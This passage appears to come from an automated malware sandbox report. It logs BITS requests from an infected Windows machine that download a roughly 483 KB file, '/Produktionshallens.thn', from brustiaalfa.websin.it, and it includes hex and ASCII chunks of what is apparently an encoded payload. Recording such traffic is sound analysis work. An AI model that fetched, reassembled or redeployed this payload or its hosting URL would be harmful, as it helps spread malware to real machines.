                                                        2024-03-18 07:07:34 UTC7983INData Raw: 36 77 4c 6d 6e 6e 45 42 6d 37 74 47 37 77 77 41 36 77 4c 49 6e 33 45 42 6d 77 4e 63 4a 41 54 72 41 74 30 77 36 77 4b 5a 5a 62 6b 52 6e 36 38 48 36 77 4c 68 51 75 73 43 38 76 57 42 77 61 4a 51 6a 54 6c 78 41 5a 76 72 41 6a 51 68 67 65 6d 7a 37 7a 78 42 36 77 4a 77 51 33 45 42 6d 2b 73 43 46 51 54 72 41 6a 72 76 75 72 4c 71 66 62 62 72 41 75 50 6b 36 77 4c 46 46 2b 73 43 4c 5a 6a 72 41 6e 62 4f 4d 63 72 72 41 6d 32 77 36 77 49 68 34 49 6b 55 43 2b 73 43 67 6b 66 72 41 72 51 36 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 75 78 2b 36 77 4c 47 33 6f 48 35 65 6b 4d 41 41 58 7a 49 63 51 47 62 36 77 4b 44 30 49 74 45 4a 41 54 72 41 75 52 68 36 77 4b 2b 70 6f 6e 44 36 77 4c 6a 36 65 73 43 68 77 71 42 77 2f 72 77 54 51 42 78 41 5a 76 72 41 73 2b 57 75 6f 43
                                                        Data Ascii: 6wLmnnEBm7tG7wwA6wLIn3EBmwNcJATrAt0w6wKZZbkRn68H6wLhQusC8vWBwaJQjTlxAZvrAjQhgemz7zxB6wJwQ3EBm+sCFQTrAjrvurLqfbbrAuPk6wLFF+sCLZjrAnbOMcrrAm2w6wIh4IkUC+sCgkfrArQ60eJxAZtxAZuDwQTrAux+6wLG3oH5ekMAAXzIcQGb6wKD0ItEJATrAuRh6wK+ponD6wLj6esChwqBw/rwTQBxAZvrAs+WuoC
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 6b 54 66 32 58 4a 6e 65 52 34 62 46 75 4b 62 54 2b 52 51 55 45 53 77 42 58 61 53 44 74 74 2f 4c 4a 55 68 73 6e 59 32 4a 67 68 2b 47 57 62 47 67 4f 64 41 6a 55 79 50 65 42 45 55 43 59 48 36 53 64 30 33 4e 44 30 4e 2f 47 77 70 5a 4b 77 54 35 79 2f 37 33 4b 64 76 6c 58 73 45 4a 74 44 72 37 6f 52 48 64 4a 6d 45 65 4f 4c 6c 33 4d 43 32 39 65 33 36 78 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 79 49 75 76 64 4c 50 30 55 59 6d 30 32 31 4a 6a 39 7a 78 4c 45 65 74 4b 75 2b 6c 54 4d 6c 6e 61 7a 57 78 54 71 74 34 2b 77 6f 6d 30 74 6f 71 4b 42 49 53 34 30 41 39 51 67 6f 42 65 33 4a 59 47 32 67 31 31 61 79 37 46 48 7a 47 68 69 42 66 2b 64 35 61 44 39 79 66 36 6a 6e 6a 4e 62 2b 77 55 48 78 36 32 52 64 67 4a 4c 2b
                                                        Data Ascii: kTf2XJneR4bFuKbT+RQUESwBXaSDtt/LJUhsnY2Jgh+GWbGgOdAjUyPeBEUCYH6Sd03ND0N/GwpZKwT5y/73KdvlXsEJtDr7oRHdJmEeOLl3MC29e36xgX8wLYF/MC2BfzAtgX8wLYF/MC2BfzAtgyIuvdLP0UYm021Jj9zxLEetKu+lTMlnazWxTqt4+wom0toqKBIS40A9QgoBe3JYG2g11ay7FHzGhiBf+d5aD9yf6jnjNb+wUHx62RdgJL+
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 4e 59 62 47 41 71 6f 38 38 32 34 6a 72 6b 32 2f 30 61 61 76 43 45 48 43 34 34 73 58 63 77 4c 77 72 75 43 44 6a 62 68 64 45 47 4b 62 30 33 4e 4e 4e 4f 64 79 75 47 70 41 43 55 5a 43 45 33 39 6f 4b 65 4f 72 6a 50 44 52 65 68 70 62 46 46 74 35 5a 43 79 47 4f 64 61 4c 79 44 50 32 33 54 79 59 59 31 79 6f 58 37 63 38 79 34 66 4f 39 31 74 42 51 62 65 6c 41 76 6a 64 6f 6b 56 71 37 70 73 56 41 54 6a 63 75 43 69 2b 56 42 59 73 35 4b 4b 7a 52 50 4f 43 32 44 78 48 4f 4e 33 55 4d 77 64 64 56 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 39 65 79 30 72 48 57 30 4d 67 53 68 44 4a 39 31 45 43 44 4b 49 6f 43 4d 32 36 66 54 61 78 43 30 32 46 69 74
                                                        Data Ascii: fzAtgX8wLYF/MC2BfzAtgX8wLYNYbGAqo8824jrk2/0aavCEHC44sXcwLwruCDjbhdEGKb03NNNOdyuGpACUZCE39oKeOrjPDRehpbFFt5ZCyGOdaLyDP23TyYY1yoX7c8y4fO91tBQbelAvjdokVq7psVATjcuCi+VBYs5KKzRPOC2DxHON3UMwddV/MC2BfzAtgX8wLYF/MC2BfzAtgX8wLYF9ey0rHW0MgShDJ91ECDKIoCM26fTaxC02Fit
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 42 7a 51 74 67 6b 39 39 39 63 36 4e 49 66 79 44 31 74 33 47 72 69 63 79 30 4c 57 32 49 51 2f 68 6e 6f 71 52 52 44 38 38 39 48 2f 6c 50 61 4d 31 64 2b 75 33 54 37 6b 58 4e 36 64 4c 2f 43 57 42 66 52 63 6f 78 43 48 4e 54 44 70 73 6d 69 70 63 6b 51 56 49 76 33 6a 74 37 52 45 43 64 69 6f 2f 50 51 4a 65 4c 33 69 50 49 57 62 6e 45 57 76 7a 57 4c 51 70 5a 77 6b 6a 51 45 45 37 62 43 4f 46 73 6b 49 45 48 59 74 39 63 6d 33 37 4a 68 67 73 55 4e 51 76 70 57 5a 79 59 55 38 2b 55 4b 71 58 53 66 46 78 68 67 6b 4d 5a 4f 31 6d 79 51 55 35 6e 48 46 4a 59 6f 35 4f 41 37 57 7a 4f 43 32 43 54 78 4a 53 2b 62 6f 6a 73 49 78 69 4e 2b 61 5a 55 4d 31 4f 31 56 49 30 6e 64 45 31 7a 75 39 37 46 41 66 48 4a 65 30 42 6d 6b 62 6f 66 74 4a 78 66 77 77 42 6c 74 39 76 47 5a 46 2b 66 73 45
                                                        Data Ascii: BzQtgk999c6NIfyD1t3Gricy0LW2IQ/hnoqRRD889H/lPaM1d+u3T7kXN6dL/CWBfRcoxCHNTDpsmipckQVIv3jt7RECdio/PQJeL3iPIWbnEWvzWLQpZwkjQEE7bCOFskIEHYt9cm37JhgsUNQvpWZyYU8+UKqXSfFxhgkMZO1myQU5nHFJYo5OA7WzOC2CTxJS+bojsIxiN+aZUM1O1VI0ndE1zu97FAfHJe0BmkboftJxfwwBlt9vGZF+fsE
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 2f 77 75 44 64 4f 4e 63 32 77 57 59 4e 56 4f 57 66 6b 6f 72 56 73 73 30 4c 59 43 54 68 4e 38 55 4a 63 75 65 2f 37 6a 75 4b 6a 6b 35 39 5a 36 58 65 4f 6a 51 41 35 33 4f 4b 6a 70 56 75 39 2b 33 57 32 6d 66 35 48 75 77 62 4c 55 6c 50 39 6c 71 54 71 69 4e 4f 55 31 6b 4e 62 62 51 58 78 6f 70 65 68 6a 30 58 62 6b 39 37 33 2b 31 76 6b 76 57 6f 5a 4e 4d 2b 33 6e 6e 6d 59 56 2f 4d 47 37 41 49 35 46 76 59 49 75 2f 73 67 47 72 72 39 34 76 2f 34 56 47 2b 55 34 78 63 2f 4e 59 72 43 6d 66 43 71 6f 36 70 4c 4f 64 53 78 43 58 4e 72 6a 43 77 64 61 4b 4f 49 72 76 62 62 54 57 4a 6e 31 38 36 36 2f 2b 78 53 68 68 39 64 79 4e 59 61 5a 49 54 36 52 2b 53 67 67 4a 4a 42 6a 6f 33 44 69 59 4d 39 4e 4f 39 5a 67 35 55 42 71 67 50 45 7a 34 48 54 62 36 4e 58 73 77 4c 74 56 59 7a 68 4b
                                                        Data Ascii: /wuDdONc2wWYNVOWfkorVss0LYCThN8UJcue/7juKjk59Z6XeOjQA53OKjpVu9+3W2mf5HuwbLUlP9lqTqiNOU1kNbbQXxopehj0Xbk973+1vkvWoZNM+3nnmYV/MG7AI5FvYIu/sgGrr94v/4VG+U4xc/NYrCmfCqo6pLOdSxCXNrjCwdaKOIrvbbTWJn1866/+xShh9dyNYaZIT6R+SggJJBjo3DiYM9NO9Zg5UBqgPEz4HTb6NXswLtVYzhK
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77
                                                        Data Ascii: AWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWw
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 6f 41 39 37 68 74 70 32 48 76 72 6d 63 6c 2b 6d 2f 7a 51 50 39 5a 67 70 30 52 77 4b 63 45 55 59 57 2b 2b 69 44 67 35 64 72 58 6b 2b 33 70 68 68 6e 4d 47 44 32 49 70 75 70 50 76 59 76 73 2f 51 47 72 71 35 65 78 6e 70 44 45 36 41 2b 67 49 6b 43 4a 78 41 31 75 4d 39 74 57 59 2b 55 6a 71 67 47 54 54 39 45 78 71 58 65 32 77 68 7a 79 64 2f 6d 2f 6f 71 6e 52 32 67 42 79 39 34 4c 4c 66 31 6b 37 6c 76 38 31 69 77 43 57 4d 4b 71 6a 71 41 76 79 37 6d 50 6d 68 36 58 36 46 58 65 7a 52 54 54 5a 6d 44 68 4e 6b 48 4d 33 76 36 68 59 39 54 4f 78 2b 48 45 2f 45 30 35 64 39 76 79 4c 77 57 2f 4a 79 50 34 76 68 39 46 39 67 36 6e 66 63 64 68 31 78 31 38 75 6f 4e 5a 71 68 61 34 62 66 69 2b 48 30 58 32 44 71 64 39 78 32 48 58 48 58 79 36 67 31 6d 71 46 72 68 74 4f 44 6e 31 32 44
                                                        Data Ascii: oA97htp2Hvrmcl+m/zQP9Zgp0RwKcEUYW++iDg5drXk+3phhnMGD2IpupPvYvs/QGrq5exnpDE6A+gIkCJxA1uM9tWY+UjqgGTT9ExqXe2whzyd/m/oqnR2gBy94LLf1k7lv81iwCWMKqjqAvy7mPmh6X6FXezRTTZmDhNkHM3v6hY9TOx+HE/E05d9vyLwW/JyP4vh9F9g6nfcdh1x18uoNZqha4bfi+H0X2Dqd9x2HXHXy6g1mqFrhtODn12D
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 45 42 79 37 70 33 57 77 7a 6a 67 57 71 4e 6b 4f 56 6b 72 46 76 79 56 59 54 34 62 56 58 69 79 53 74 6d 72 55 6c 68 66 33 68 34 62 47 48 51 59 79 33 54 65 55 31 77 51 51 35 34 61 6c 78 61 74 77 34 54 63 32 49 4c 2f 4e 64 4e 38 4e 46 37 47 46 6f 55 57 33 6c 6f 62 55 6e 51 31 50 66 57 4b 4b 47 74 79 69 55 2f 67 65 68 4e 73 74 77 47 35 46 52 77 69 49 36 6d 48 4d 68 34 38 6e 4b 6e 39 30 4c 6a 5a 32 46 37 49 72 2f 33 2f 75 68 63 52 4d 50 54 33 30 75 78 6a 72 4b 45 41 44 31 79 54 37 65 50 6b 37 54 37 77 74 62 32 47 55 37 2f 44 74 71 45 33 37 48 79 50 6b 75 72 54 48 75 50 6c 59 47 38 75 58 70 56 35 6c 34 76 55 63 6c 5a 57 59 72 6b 4d 59 68 45 74 58 4e 32 78 76 41 51 39 68 4a 6f 42 43 4e 44 4a 63 68 77 39 45 65 4f 45 69 46 68 5a 43 4c 79 45 70 68 33 33 36 55 78 34
                                                        Data Ascii: EBy7p3WwzjgWqNkOVkrFvyVYT4bVXiyStmrUlhf3h4bGHQYy3TeU1wQQ54alxatw4Tc2IL/NdN8NF7GFoUW3lobUnQ1PfWKKGtyiU/gehNstwG5FRwiI6mHMh48nKn90LjZ2F7Ir/3/uhcRMPT30uxjrKEAD1yT7ePk7T7wtb2GU7/DtqE37HyPkurTHuPlYG8uXpV5l4vUclZWYrkMYhEtXN2xvAQ9hJoBCNDJchw9EeOEiFhZCLyEph336Ux4
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 5a 58 32 38 79 35 63 33 44 65 67 5a 4e 2b 52 30 6c 41 45 48 68 6e 53 6a 62 68 65 5a 4e 79 55 57 68 6c 76 48 68 74 55 6d 4c 64 35 65 66 6c 2b 6d 38 7a 52 6a 39 4f 55 6e 31 47 30 54 67 57 6d 4a 78 6e 51 34 58 61 75 51 74 58 51 55 46 70 5a 50 30 78 2b 33 56 57 71 38 43 57 65 50 50 44 45 50 59 48 63 4d 51 75 37 55 7a 6c 41 52 4e 64 68 42 72 59 67 74 67 55 45 4f 74 4f 56 76 4d 55 57 39 66 45 68 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 79 4d 6a 6d 73 53 41 37 67 30 77 74 68 69 71 52 76 54 57 4a 32 66 73 56 33 2b 50 56 56 34 71 4c 6e 38 2b 61 61 39 34 6e 42 45 61 39 42 56 68 76 6d 50 7a 50 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 4e 50 47 32 72
                                                        Data Ascii: ZX28y5c3DegZN+R0lAEHhnSjbheZNyUWhlvHhtUmLd5efl+m8zRj9OUn1G0TgWmJxnQ4XauQtXQUFpZP0x+3VWq8CWePPDEPYHcMQu7UzlARNdhBrYgtgUEOtOVvMUW9fEhtgX8wLYF/MC2BfzAtgX8wLYF/MC2BfzAtgyMjmsSA7g0wthiqRvTWJ2fsV3+PVV4qLn8+aa94nBEa9BVhvmPzPYF/MC2BfzAtgX8wLYF/MC2BfzAtgX8wLYNPG2r
                                                        2024-03-18 07:07:34 UTC8000INData Raw: 63 7a 67 74 67 78 4d 6a 49 66 6a 6c 4a 32 2b 48 71 7a 77 6c 67 58 38 74 66 78 54 46 4e 70 6d 4e 64 7a 41 73 59 50 4e 48 4d 35 4c 68 4e 64 68 43 4c 59 51 74 67 55 45 46 74 49 6c 76 4d 53 4a 2f 53 7a 77 6c 67 58 37 6e 68 49 35 6a 50 42 77 59 55 43 34 70 54 41 41 48 65 48 6d 63 63 69 6c 4f 6c 6f 47 50 52 33 76 2b 56 63 51 78 7a 57 4e 76 49 7a 41 74 67 33 6a 63 44 74 45 66 5a 42 4f 32 50 6a 41 39 67 42 45 33 49 63 58 50 46 43 2b 47 30 77 53 64 70 58 2f 58 42 42 74 34 7a 33 33 2b 59 7a 78 45 43 52 69 32 4b 6d 55 67 43 4f 6c 5a 6e 4d 59 70 6a 65 46 63 35 62 32 63 56 69 6c 50 6e 4c 44 4d 64 44 48 63 43 37 5a 6d 45 69 4a 74 64 77 34 66 78 48 38 67 4c 4f 39 37 6e 37 6b 43 33 45 4d 7a 6c 33 4d 30 4c 59 48 32 42 7a 44 48 62 46 6f 72 56 33 4d 30 4c 59 45 63 74 37 33
                                                        Data Ascii: czgtgxMjIfjlJ2+HqzwlgX8tfxTFNpmNdzAsYPNHM5LhNdhCLYQtgUEFtIlvMSJ/SzwlgX7nhI5jPBwYUC4pTAAHeHmccilOloGPR3v+VcQxzWNvIzAtg3jcDtEfZBO2PjA9gBE3IcXPFC+G0wSdpX/XBBt4z33+YzxECRi2KmUgCOlZnMYpjeFc5b2cVilPnLDMdDHcC7ZmEiJtdw4fxH8gLO97n7kC3EMzl3M0LYH2BzDHbForV3M0LYEct73


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.54973489.40.227.2484434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:07:41 UTC166OUTHEAD /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:41 UTC209INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:36 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.54973689.40.227.2484434568C:\Windows\System32\svchost.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:07:42 UTC217OUTGET /Produktionshallens.thn HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        Accept-Encoding: identity
                                                        If-Unmodified-Since: Mon, 18 Mar 2024 01:27:54 GMT
                                                        User-Agent: Microsoft BITS/7.8
                                                        Host: brustiaalfa.websin.it
                                                        2024-03-18 07:07:42 UTC209INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:07:37 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:27:54 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 483156
                                                        2024-03-18 07:07:42 UTC7983INData Raw: 36 77 4c 6d 6e 6e 45 42 6d 37 74 47 37 77 77 41 36 77 4c 49 6e 33 45 42 6d 77 4e 63 4a 41 54 72 41 74 30 77 36 77 4b 5a 5a 62 6b 52 6e 36 38 48 36 77 4c 68 51 75 73 43 38 76 57 42 77 61 4a 51 6a 54 6c 78 41 5a 76 72 41 6a 51 68 67 65 6d 7a 37 7a 78 42 36 77 4a 77 51 33 45 42 6d 2b 73 43 46 51 54 72 41 6a 72 76 75 72 4c 71 66 62 62 72 41 75 50 6b 36 77 4c 46 46 2b 73 43 4c 5a 6a 72 41 6e 62 4f 4d 63 72 72 41 6d 32 77 36 77 49 68 34 49 6b 55 43 2b 73 43 67 6b 66 72 41 72 51 36 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 75 78 2b 36 77 4c 47 33 6f 48 35 65 6b 4d 41 41 58 7a 49 63 51 47 62 36 77 4b 44 30 49 74 45 4a 41 54 72 41 75 52 68 36 77 4b 2b 70 6f 6e 44 36 77 4c 6a 36 65 73 43 68 77 71 42 77 2f 72 77 54 51 42 78 41 5a 76 72 41 73 2b 57 75 6f 43
                                                        Data Ascii: 6wLmnnEBm7tG7wwA6wLIn3EBmwNcJATrAt0w6wKZZbkRn68H6wLhQusC8vWBwaJQjTlxAZvrAjQhgemz7zxB6wJwQ3EBm+sCFQTrAjrvurLqfbbrAuPk6wLFF+sCLZjrAnbOMcrrAm2w6wIh4IkUC+sCgkfrArQ60eJxAZtxAZuDwQTrAux+6wLG3oH5ekMAAXzIcQGb6wKD0ItEJATrAuRh6wK+ponD6wLj6esChwqBw/rwTQBxAZvrAs+WuoC
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 6b 54 66 32 58 4a 6e 65 52 34 62 46 75 4b 62 54 2b 52 51 55 45 53 77 42 58 61 53 44 74 74 2f 4c 4a 55 68 73 6e 59 32 4a 67 68 2b 47 57 62 47 67 4f 64 41 6a 55 79 50 65 42 45 55 43 59 48 36 53 64 30 33 4e 44 30 4e 2f 47 77 70 5a 4b 77 54 35 79 2f 37 33 4b 64 76 6c 58 73 45 4a 74 44 72 37 6f 52 48 64 4a 6d 45 65 4f 4c 6c 33 4d 43 32 39 65 33 36 78 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 79 49 75 76 64 4c 50 30 55 59 6d 30 32 31 4a 6a 39 7a 78 4c 45 65 74 4b 75 2b 6c 54 4d 6c 6e 61 7a 57 78 54 71 74 34 2b 77 6f 6d 30 74 6f 71 4b 42 49 53 34 30 41 39 51 67 6f 42 65 33 4a 59 47 32 67 31 31 61 79 37 46 48 7a 47 68 69 42 66 2b 64 35 61 44 39 79 66 36 6a 6e 6a 4e 62 2b 77 55 48 78 36 32 52 64 67 4a 4c 2b
                                                        Data Ascii: kTf2XJneR4bFuKbT+RQUESwBXaSDtt/LJUhsnY2Jgh+GWbGgOdAjUyPeBEUCYH6Sd03ND0N/GwpZKwT5y/73KdvlXsEJtDr7oRHdJmEeOLl3MC29e36xgX8wLYF/MC2BfzAtgX8wLYF/MC2BfzAtgyIuvdLP0UYm021Jj9zxLEetKu+lTMlnazWxTqt4+wom0toqKBIS40A9QgoBe3JYG2g11ay7FHzGhiBf+d5aD9yf6jnjNb+wUHx62RdgJL+
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 4e 59 62 47 41 71 6f 38 38 32 34 6a 72 6b 32 2f 30 61 61 76 43 45 48 43 34 34 73 58 63 77 4c 77 72 75 43 44 6a 62 68 64 45 47 4b 62 30 33 4e 4e 4e 4f 64 79 75 47 70 41 43 55 5a 43 45 33 39 6f 4b 65 4f 72 6a 50 44 52 65 68 70 62 46 46 74 35 5a 43 79 47 4f 64 61 4c 79 44 50 32 33 54 79 59 59 31 79 6f 58 37 63 38 79 34 66 4f 39 31 74 42 51 62 65 6c 41 76 6a 64 6f 6b 56 71 37 70 73 56 41 54 6a 63 75 43 69 2b 56 42 59 73 35 4b 4b 7a 52 50 4f 43 32 44 78 48 4f 4e 33 55 4d 77 64 64 56 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 39 65 79 30 72 48 57 30 4d 67 53 68 44 4a 39 31 45 43 44 4b 49 6f 43 4d 32 36 66 54 61 78 43 30 32 46 69 74
                                                        Data Ascii: fzAtgX8wLYF/MC2BfzAtgX8wLYNYbGAqo8824jrk2/0aavCEHC44sXcwLwruCDjbhdEGKb03NNNOdyuGpACUZCE39oKeOrjPDRehpbFFt5ZCyGOdaLyDP23TyYY1yoX7c8y4fO91tBQbelAvjdokVq7psVATjcuCi+VBYs5KKzRPOC2DxHON3UMwddV/MC2BfzAtgX8wLYF/MC2BfzAtgX8wLYF9ey0rHW0MgShDJ91ECDKIoCM26fTaxC02Fit
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 42 7a 51 74 67 6b 39 39 39 63 36 4e 49 66 79 44 31 74 33 47 72 69 63 79 30 4c 57 32 49 51 2f 68 6e 6f 71 52 52 44 38 38 39 48 2f 6c 50 61 4d 31 64 2b 75 33 54 37 6b 58 4e 36 64 4c 2f 43 57 42 66 52 63 6f 78 43 48 4e 54 44 70 73 6d 69 70 63 6b 51 56 49 76 33 6a 74 37 52 45 43 64 69 6f 2f 50 51 4a 65 4c 33 69 50 49 57 62 6e 45 57 76 7a 57 4c 51 70 5a 77 6b 6a 51 45 45 37 62 43 4f 46 73 6b 49 45 48 59 74 39 63 6d 33 37 4a 68 67 73 55 4e 51 76 70 57 5a 79 59 55 38 2b 55 4b 71 58 53 66 46 78 68 67 6b 4d 5a 4f 31 6d 79 51 55 35 6e 48 46 4a 59 6f 35 4f 41 37 57 7a 4f 43 32 43 54 78 4a 53 2b 62 6f 6a 73 49 78 69 4e 2b 61 5a 55 4d 31 4f 31 56 49 30 6e 64 45 31 7a 75 39 37 46 41 66 48 4a 65 30 42 6d 6b 62 6f 66 74 4a 78 66 77 77 42 6c 74 39 76 47 5a 46 2b 66 73 45
                                                        Data Ascii: BzQtgk999c6NIfyD1t3Gricy0LW2IQ/hnoqRRD889H/lPaM1d+u3T7kXN6dL/CWBfRcoxCHNTDpsmipckQVIv3jt7RECdio/PQJeL3iPIWbnEWvzWLQpZwkjQEE7bCOFskIEHYt9cm37JhgsUNQvpWZyYU8+UKqXSfFxhgkMZO1myQU5nHFJYo5OA7WzOC2CTxJS+bojsIxiN+aZUM1O1VI0ndE1zu97FAfHJe0BmkboftJxfwwBlt9vGZF+fsE
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 2f 77 75 44 64 4f 4e 63 32 77 57 59 4e 56 4f 57 66 6b 6f 72 56 73 73 30 4c 59 43 54 68 4e 38 55 4a 63 75 65 2f 37 6a 75 4b 6a 6b 35 39 5a 36 58 65 4f 6a 51 41 35 33 4f 4b 6a 70 56 75 39 2b 33 57 32 6d 66 35 48 75 77 62 4c 55 6c 50 39 6c 71 54 71 69 4e 4f 55 31 6b 4e 62 62 51 58 78 6f 70 65 68 6a 30 58 62 6b 39 37 33 2b 31 76 6b 76 57 6f 5a 4e 4d 2b 33 6e 6e 6d 59 56 2f 4d 47 37 41 49 35 46 76 59 49 75 2f 73 67 47 72 72 39 34 76 2f 34 56 47 2b 55 34 78 63 2f 4e 59 72 43 6d 66 43 71 6f 36 70 4c 4f 64 53 78 43 58 4e 72 6a 43 77 64 61 4b 4f 49 72 76 62 62 54 57 4a 6e 31 38 36 36 2f 2b 78 53 68 68 39 64 79 4e 59 61 5a 49 54 36 52 2b 53 67 67 4a 4a 42 6a 6f 33 44 69 59 4d 39 4e 4f 39 5a 67 35 55 42 71 67 50 45 7a 34 48 54 62 36 4e 58 73 77 4c 74 56 59 7a 68 4b
                                                        Data Ascii: /wuDdONc2wWYNVOWfkorVss0LYCThN8UJcue/7juKjk59Z6XeOjQA53OKjpVu9+3W2mf5HuwbLUlP9lqTqiNOU1kNbbQXxopehj0Xbk973+1vkvWoZNM+3nnmYV/MG7AI5FvYIu/sgGrr94v/4VG+U4xc/NYrCmfCqo6pLOdSxCXNrjCwdaKOIrvbbTWJn1866/+xShh9dyNYaZIT6R+SggJJBjo3DiYM9NO9Zg5UBqgPEz4HTb6NXswLtVYzhK
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77
                                                        Data Ascii: AWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWw
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 6f 41 39 37 68 74 70 32 48 76 72 6d 63 6c 2b 6d 2f 7a 51 50 39 5a 67 70 30 52 77 4b 63 45 55 59 57 2b 2b 69 44 67 35 64 72 58 6b 2b 33 70 68 68 6e 4d 47 44 32 49 70 75 70 50 76 59 76 73 2f 51 47 72 71 35 65 78 6e 70 44 45 36 41 2b 67 49 6b 43 4a 78 41 31 75 4d 39 74 57 59 2b 55 6a 71 67 47 54 54 39 45 78 71 58 65 32 77 68 7a 79 64 2f 6d 2f 6f 71 6e 52 32 67 42 79 39 34 4c 4c 66 31 6b 37 6c 76 38 31 69 77 43 57 4d 4b 71 6a 71 41 76 79 37 6d 50 6d 68 36 58 36 46 58 65 7a 52 54 54 5a 6d 44 68 4e 6b 48 4d 33 76 36 68 59 39 54 4f 78 2b 48 45 2f 45 30 35 64 39 76 79 4c 77 57 2f 4a 79 50 34 76 68 39 46 39 67 36 6e 66 63 64 68 31 78 31 38 75 6f 4e 5a 71 68 61 34 62 66 69 2b 48 